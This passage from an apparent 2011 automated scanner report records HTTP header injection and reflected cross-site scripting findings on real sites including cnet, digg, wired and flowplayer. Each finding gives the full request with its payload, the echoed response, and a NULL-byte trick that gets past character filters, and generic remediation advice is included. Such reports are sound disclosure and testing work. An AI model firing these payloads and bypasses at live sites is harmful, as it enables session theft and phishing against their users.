User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A2=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=024f98eb-350f-4908-b357-ea686989a5173G9010; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=024f98eb-350f-4908-b357-ea686989a5173G9010; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=74b8f
8312f755b94; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 12 Jan 2011 03:00:27 GMT
Connection: close
Content-Length: 0

2.19. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/adServer.bs

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload da838%0d%0a0be295012bc was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=1901699&PluID=0&w=300&h=250&ord=2011.01.09.21.57.52&ifrm=2&ucm=true HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://download.cnet.com/8301-2007_4-20027809-12.html?tag=mncol;title
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: E2=09MY8y8ysF; A2=gn3Ka4JO09MY00008y8ysF; B2=83xP08y8ysF; C3=0u3F8y8ysF0000040_; D3=0u3F00358y8ysF; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; u3=1; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0da838%0d%0a0be295012bc

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0da838
0be295012bc; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A2=gn3Ka4JO09MY00008y8ysFfU+La5OG0a+r0000820wsI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=83xP08y8ysF7gi30820wsI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0u3F8y8ysF0000040_0uO9820wsI0000002_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0u3F00358y8ysF0uO9002P820wsI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: E2=0a+r820wsI09MY8y8ysF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 12 Jan 2011 03:02:35 GMT
Connection: close
Content-Length: 2224

<HTML><Body><Script>/*1*/var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=e
...[SNIP]...

2.20. http://download.cnet.com/8737-1_1-0.xml [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://download.cnet.com
Path:	/8737-1_1-0.xml

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8dbf5%0d%0a555872e04e3 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8737-1_1-0.xml8dbf5%0d%0a555872e04e3 HTTP/1.1
Host: download.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: XCLGFbrowser=Cg5iVU0qL2O/AAAAdRw; MADTEST=1; rbSessionId=Cg5gU00qL2CtwdbzqSI; MADUCAT=1&0109&BK14860; mad_rsi_segs=; arrowLat=1294610272673; arrowSpc=1; tempSessionId=Cg5gnU0qL2CtwdbzfuE; arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html;

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 12 Jan 2011 03:41:04 GMT
Server: Apache/2.2
Location: http://www.cnet.com/8737-1_1-0.xml8dbf5
555872e04e3
Content-Length: 260
Keep-Alive: timeout=15, max=995
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Expires: Wed, 12 Jan 2011 03:41:04 GMT

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.cnet.com/873
...[SNIP]...

3. Cross-site scripting (reflected) previous next
There are 79 instances of this issue:

http://ad.insightexpressai.com/adserver/adServer.aspx [name of an arbitrarily supplied request parameter]
http://dean.edwards.name/weblog/2006/03/base/ [REST URL parameter 1]
http://dean.edwards.name/weblog/2006/03/base/ [REST URL parameter 1]
http://dean.edwards.name/weblog/2006/03/base/ [REST URL parameter 4]
http://dean.edwards.name/weblog/2006/03/base/ [name of an arbitrarily supplied request parameter]
http://digg.com/submit [REST URL parameter 1]
http://flowplayer.org/tools/ [REST URL parameter 1]
http://landesm.gfi.com/event-log-analysis-sm/ [REST URL parameter 1]
http://mads.cnet.com/mac-ad [name of an arbitrarily supplied request parameter]
http://weeklyad.target.com/target/default.aspx [name of an arbitrarily supplied request parameter]
http://www.addthis.com/bookmark.php [REST URL parameter 1]
http://www.addthis.com/bookmark.php [REST URL parameter 1]
http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]
http://www.ccmaine.net/AboutUs [REST URL parameter 1]
http://www.ccmaine.net/AboutUs [REST URL parameter 1]
http://www.ccmaine.net/BillingPolicy [REST URL parameter 1]
http://www.ccmaine.net/BillingPolicy [REST URL parameter 1]
http://www.ccmaine.net/ContactUs [REST URL parameter 1]
http://www.ccmaine.net/ContactUs [REST URL parameter 1]
http://www.ccmaine.net/HomePage [REST URL parameter 1]
http://www.ccmaine.net/HomePage [REST URL parameter 1]
http://www.ccmaine.net/ServiceArea [REST URL parameter 1]
http://www.ccmaine.net/ServiceArea [REST URL parameter 1]
http://www.ccmaine.net/ServiceOfferings [REST URL parameter 1]
http://www.ccmaine.net/ServiceOfferings [REST URL parameter 1]
http://www.ccmaine.net/TechnicalSupport [REST URL parameter 1]
http://www.ccmaine.net/TechnicalSupport [REST URL parameter 1]
http://www.ccmaine.net/a [REST URL parameter 1]
http://www.ccmaine.net/a [REST URL parameter 1]
https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Allure [REST URL parameter 5]
https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_ArchitecturalDigest [REST URL parameter 5]
https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_BonAppetite [REST URL parameter 5]
https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Brides [REST URL parameter 5]
https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_CondeNastPortfolio [REST URL parameter 5]
https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_CondeNastTraveler [REST URL parameter 5]
https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Details [REST URL parameter 5]
https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_ElegantBride [REST URL parameter 5]
https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_GQ [REST URL parameter 5]
https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Glamour [REST URL parameter 5]
https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_GolfDigest [REST URL parameter 5]
https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_GolfWorld [REST URL parameter 5]
https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Lucky [REST URL parameter 5]
https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_ModernBride [REST URL parameter 5]
https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_NewYorker [REST URL parameter 5]
https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Self [REST URL parameter 5]
https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_TeenVogue [REST URL parameter 5]
https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_VanityFair [REST URL parameter 5]
https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Vogue [REST URL parameter 5]
https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_W [REST URL parameter 5]
https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Wired [REST URL parameter 5]
http://www.tukui.org/v2/blog/ [name of an arbitrarily supplied request parameter]
http://www.tukui.org/v2/category/others/ [name of an arbitrarily supplied request parameter]
http://www.wired.com/ajax/widgets/related/content/blogPost/threatlevel_22564 [REST URL parameter 1]
http://www.wired.com/ajax/widgets/related/content/blogPost/threatlevel_22564 [REST URL parameter 2]
http://www.wired.com/ajax/widgets/related/content/blogPost/threatlevel_22564 [REST URL parameter 3]
http://www.wired.com/services/dart/init/threatlevel/kw=threatlevel [REST URL parameter 1]
http://www.wired.com/services/dart/init/threatlevel/kw=threatlevel [REST URL parameter 1]
http://www.wired.com/services/dart/init/threatlevel/kw=threatlevel [REST URL parameter 2]
http://www.wired.com/services/dart/init/threatlevel/kw=threatlevel [REST URL parameter 2]
http://www.wired.com/services/dart/init/threatlevel/kw=threatlevel [REST URL parameter 3]
http://www.wired.com/services/dart/init/threatlevel/kw=threatlevel [REST URL parameter 3]
http://www.wired.com/services/dart/init/threatlevel/kw=threatlevel [REST URL parameter 5]
http://www.wired.com/user/login [REST URL parameter 1]
http://www.wired.com/user/login [REST URL parameter 2]
http://www.wired.com/user/logout [REST URL parameter 1]
http://www.wired.com/user/logout [REST URL parameter 2]
http://www.wired.com/user/registration [REST URL parameter 1]
http://www.wired.com/user/registration [REST URL parameter 2]
http://www.wired.com/video/ [REST URL parameter 1]
http://www.wired.com/video/search/ [REST URL parameter 1]
http://www.wired.com/video/search/ [REST URL parameter 2]
http://www.wired.com/video/search/ [REST URL parameter 2]
http://www.addthis.com/bookmark.php [Referer HTTP header]
http://www.addthis.com/bookmark.php [Referer HTTP header]
http://www.cbsinteractive.com/adfeedback/ [Referer HTTP header]
http://www.pwc.com/en_GX/webadmin/forms/contactUs.jhtml [Referer HTTP header]
http://www.zdnet.com/ [Referer HTTP header]
http://www.zdnet.com/ [Referer HTTP header]
http://www.zdnet.com/ [Referer HTTP header]

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

3.1. http://ad.insightexpressai.com/adserver/adServer.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.insightexpressai.com
Path:	/adserver/adServer.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %0061395'%3balert(1)//6e3b1b635e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 61395';alert(1)//6e3b1b635e0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /adserver/adServer.aspx?publisherID=338&%0061395'%3balert(1)//6e3b1b635e0=1 HTTP/1.1
Host: ad.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Wed, 12 Jan 2011 03:06:15 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: IXAICampaignCounter2310=0; domain=.insightexpressai.com; expires=Tue, 12-Jan-2016 03:06:16 GMT; path=/
Set-Cookie: IXAIControlCounter2310=0; domain=.insightexpressai.com; expires=Tue, 12-Jan-2016 03:06:16 GMT; path=/
Set-Cookie: IXAIBannerCounter174065=0; domain=.insightexpressai.com; expires=Tue, 12-Jan-2016 03:06:16 GMT; path=/
Set-Cookie: IXAIBanners2310=174065; domain=.insightexpressai.com; expires=Tue, 12-Jan-2016 03:06:16 GMT; path=/
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Date: Wed, 12 Jan 2011 03:06:16 GMT
Connection: close
Content-Length: 1427

//174065

var lInsightExpress = {};
   lInsightExpress.AddEvent = function(obj, evType, fn)
   {
       if (obj.addEventListener){
           obj.addEventListener(evType, fn, false);
           return true;
       }
...[SNIP]...
s.type='text/javascript';
s.src = 'http://ad.insightexpressai.com/adServer/GetInvite.aspx?bannerID=174065&referer=www.wired.com&iCompass=true&SiteExpiration=21600&PublisherID=338&.61395';alert(1)//6e3b1b635e0=1&';
document.getElementsByTagName('body')[0].appendChild(s);
}
lInsightExpress.Poll();
   });

3.2. http://dean.edwards.name/weblog/2006/03/base/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://dean.edwards.name
Path:	/weblog/2006/03/base/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload %00c56e6<a>719b7d4f23f was submitted in the REST URL parameter 1. This input was echoed as c56e6<a>719b7d4f23f in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /weblog%00c56e6<a>719b7d4f23f/2006/03/base/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Wed, 12 Jan 2011 13:01:37 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Vary: Accept-Encoding
Content-Length: 1643
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html>
<head>
<title>/404</title>
<meta name="author" content="Dean Edwards">
<link rel="stylesheet" href="http://deanedwardsoffline.appspot.com/c
...[SNIP]...
<a>719b7d4f23f/">weblog%00c56e6<a>719b7d4f23f</a>
...[SNIP]...

3.3. http://dean.edwards.name/weblog/2006/03/base/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dean.edwards.name
Path:	/weblog/2006/03/base/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00edcf5"><script>alert(1)</script>81045f888fa was submitted in the REST URL parameter 1. This input was echoed as edcf5"><script>alert(1)</script>81045f888fa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /weblog%00edcf5"><script>alert(1)</script>81045f888fa/2006/03/base/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Wed, 12 Jan 2011 13:01:37 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Vary: Accept-Encoding
Content-Length: 1789
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html>
<head>
<title>/404</title>
<meta name="author" content="Dean Edwards">
<link rel="stylesheet" href="http://deanedwardsoffline.appspot.com/c
...[SNIP]...
<a href="/weblog%00edcf5"><script>alert(1)</script>81045f888fa/2006/">
...[SNIP]...

3.4. http://dean.edwards.name/weblog/2006/03/base/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://dean.edwards.name
Path:	/weblog/2006/03/base/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9a9a7<a>1c64490ce0a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /weblog/2006/03/base9a9a7<a>1c64490ce0a/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Wed, 12 Jan 2011 13:01:41 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
X-Pingback: http://dean.edwards.name/weblog/xmlrpc.php
Expires: Wed, 12 Jan 2011 13:01:42 GMT
Last-Modified: Wed, 12 Jan 2011 13:01:42 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1351
Connection: close
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html>
<head>
<title>dean.edwards.name/weblog/</title>
<meta name="author" content="Dean Edwards">
<link rel="stylesheet" href="http://deanedwards
...[SNIP]...
</a>/base9a9a7<a>1c64490ce0a/</h1>
...[SNIP]...

3.5. http://dean.edwards.name/weblog/2006/03/base/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dean.edwards.name
Path:	/weblog/2006/03/base/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 918b2"><script>alert(1)</script>616252d6220 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 918b2\"><script>alert(1)</script>616252d6220 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weblog/2006/03/base/?918b2"><script>alert(1)</script>616252d6220=1 HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:33 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
X-Pingback: http://dean.edwards.name/weblog/xmlrpc.php
Link: <http://dean.edwards.name/weblog/?p=66>; rel=shortlink
Expires: Wed, 12 Jan 2011 13:01:33 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 175876

<!doctype html>
<html>
<head>
<title>Dean Edwards: A Base Class for JavaScript Inheritance</title>
<meta name="author" content="Dean Edwards">
<link rel="styleshe
...[SNIP]...
<form class="contact" action="/weblog/2006/03/base/?918b2\"><script>alert(1)</script>616252d6220=1#preview" method="post">
...[SNIP]...

3.6. http://digg.com/submit [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://digg.com
Path:	/submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0025151"><script>alert(1)</script>c59d926219b was submitted in the REST URL parameter 1. This input was echoed as 25151"><script>alert(1)</script>c59d926219b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /submit%0025151"><script>alert(1)</script>c59d926219b HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:35:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1454381204777206016%3A154; expires=Thu, 13-Jan-2011 03:35:54 GMT; path=/; domain=digg.com
Set-Cookie: d=1f4f310684a402462325f78fa39217daa6358c237c9a72072efdd2119627f692; expires=Mon, 11-Jan-2021 13:43:34 GMT; path=/; domain=.digg.com
X-Digg-Time: D=193681 10.2.130.24
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15324

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/submit%0025151"><script>alert(1)</script>c59d926219b.rss">
...[SNIP]...

3.7. http://flowplayer.org/tools/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://flowplayer.org
Path:	/tools/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7ac8"><img%20src%3da%20onerror%3dalert(1)>9fe1b257a49 was submitted in the REST URL parameter 1. This input was echoed as b7ac8"><img src=a onerror=alert(1)>9fe1b257a49 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /toolsb7ac8"><img%20src%3da%20onerror%3dalert(1)>9fe1b257a49/ HTTP/1.1
Host: flowplayer.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Wed, 12 Jan 2011 13:02:25 GMT
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Cache-control: private
Content-Length: 5920

   <!DOCTYPE html>


<!--
   Flowplayer JavaScript, website, forums & jQuery Tools by Tero Piirainen

   Prefer web standards over Flash. Video is the only exception (f
...[SNIP]...
<body id="toolsb7ac8"><img src=a onerror=alert(1)>9fe1b257a49" class="msie tools">
...[SNIP]...

3.8. http://landesm.gfi.com/event-log-analysis-sm/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://landesm.gfi.com
Path:	/event-log-analysis-sm/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 99448'-alert(1)-'d32d8b2c2a0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /event-log-analysis-sm99448'-alert(1)-'d32d8b2c2a0/ HTTP/1.1
Host: landesm.gfi.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Date: Wed, 12 Jan 2011 03:47:03 GMT
Server: TornadoServer/1.0
Content-Length: 2200
Connection: Close

<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Oops (Error 404) - Performable</title>
<style type="text/css">
body {
font-family:"Lucida Gra
...[SNIP]...
<script type="text/javascript">
var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-10161796-3']);
_gaq.push(['_trackPageview', '/errors/landesm.gfi.com/404/event-log-analysis-sm99448'-alert(1)-'d32d8b2c2a0/']);
(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-
...[SNIP]...

3.9. http://mads.cnet.com/mac-ad [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.cnet.com
Path:	/mac-ad

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7e322<a>bbfd21a913a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?7e322<a>bbfd21a913a=1 HTTP/1.1
Host: mads.cnet.com
Accept: */*
Accept-Language: en
